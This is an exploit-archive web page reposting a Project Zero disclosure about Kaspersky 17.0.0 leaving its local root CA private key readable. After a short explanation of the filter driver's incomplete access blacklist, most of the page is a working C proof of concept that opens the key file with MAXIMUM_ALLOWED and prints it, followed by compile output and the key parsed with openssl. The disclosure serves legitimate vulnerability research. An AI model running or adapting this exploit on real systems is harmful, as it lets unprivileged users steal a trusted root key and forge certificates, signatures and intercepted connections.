首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Kaspersky 17.0.0 - Local CA root is Incorrectly Protected
来源:Google Security Research 作者:Google 发布时间:2017-01-05  
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=989
 
When Kaspersky generate a private key for the local root, they store the private key in %ProgramData%. Obviously this file cannot be shared, because it's the private key for a trusted local root certificate and users can use it to create certificates, sign files, create new roots, etc. If I look at the filesystem ACLs, I should have access, and was about to complain that they've done this incorrectly, but it doesn't work and it took me a while to figure out what they were doing.
 
$ icacls KLSSL_privkey.pem
KLSSL_privkey.pem BUILTIN\Administrators:(I)(F)
                  BUILTIN\Users:(I)(RX) <-- All users should have read access
                  NT AUTHORITY\SYSTEM:(I)(F)
 
Successfully processed 1 files; Failed processing 0 files
$ cat KLSSL_privkey.pem
cat: KLSSL_privkey.pem: Permission denied
 
Single stepping through why this fails, I can see their filter driver will deny access from their PFLT_POST_OPERATION_CALLBACK after checking the Irpb. That sounds difficult to get right, and reverse engineering the filter driver, I can see they're setting Data->IoStatus.Status = STATUS_ACCESS_DENIED if the Irpb->Parameters (like DesiredAccess or whatever) don't match a hardcoded bitmask.
 
But the blacklist is insufficient, they even missed MAXIMUM_ALLOWED (?!!!). This is trivial to exploit, any unprivileged user can now become a CA.
*/
 
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
 
int main(int argc, char **argv)
{
    HANDLE File;
    BYTE buf[2048] = {0};
    DWORD count;
 
    File = CreateFile("c:\\ProgramData\\Kaspersky Lab\\AVP17.0.0\\Data\\Cert\\KLSSL_privkey.pem",
            MAXIMUM_ALLOWED,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
    if (File != INVALID_HANDLE_VALUE) {
        if (ReadFile(File, buf, sizeof(buf), &count, NULL) == TRUE) {
            setmode(1, O_BINARY);
            fwrite(buf, 1, count, stdout);
        }
        CloseHandle(File);
        return 0;
    }
    return 1;
}
 
/*
$ cl test.c
Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.
 
test.c
Microsoft (R) Incremental Linker Version 12.00.31101.0
Copyright (C) Microsoft Corporation.  All rights reserved.
 
/out:test.exe
test.obj
$ ./test.exe | openssl rsa -inform DER -text -noout
Private-Key: (2048 bit)
modulus:
    00:b4:3f:57:21:e7:c3:45:e9:43:ec:b4:83:b4:81:
    bb:d3:3b:9b:1b:da:07:55:68:e0:b1:75:38:b9:66:
    0d:4c:e4:e7:f3:92:01:fb:33:bf:e6:34:e4:e8:db:
    f1:7c:53:bc:95:2c:2d:08:8d:7c:8c:03:71:cd:07:
*/
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zyxel/Eir D1000 DSL Modem NewN
·Brave Browser 1.2.16/1.9.56 -
·PHPMailer Sendmail Argument In
·Enigma Fileless UAC Bypass
·PHPMailer < 5.2.20 / SwiftMail
·DiskBoss Enterprise 7.5.12 - '
·Internet Download Accelerator
·Microsoft Windows Kernel - 'wi
·Xfinity Gateway (Technicolor D
·Microsoft Windows 8.1 (x64) -
·Zend Framework / zend-mail < 2
·Cemu 1.6.4b - Information Leak
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved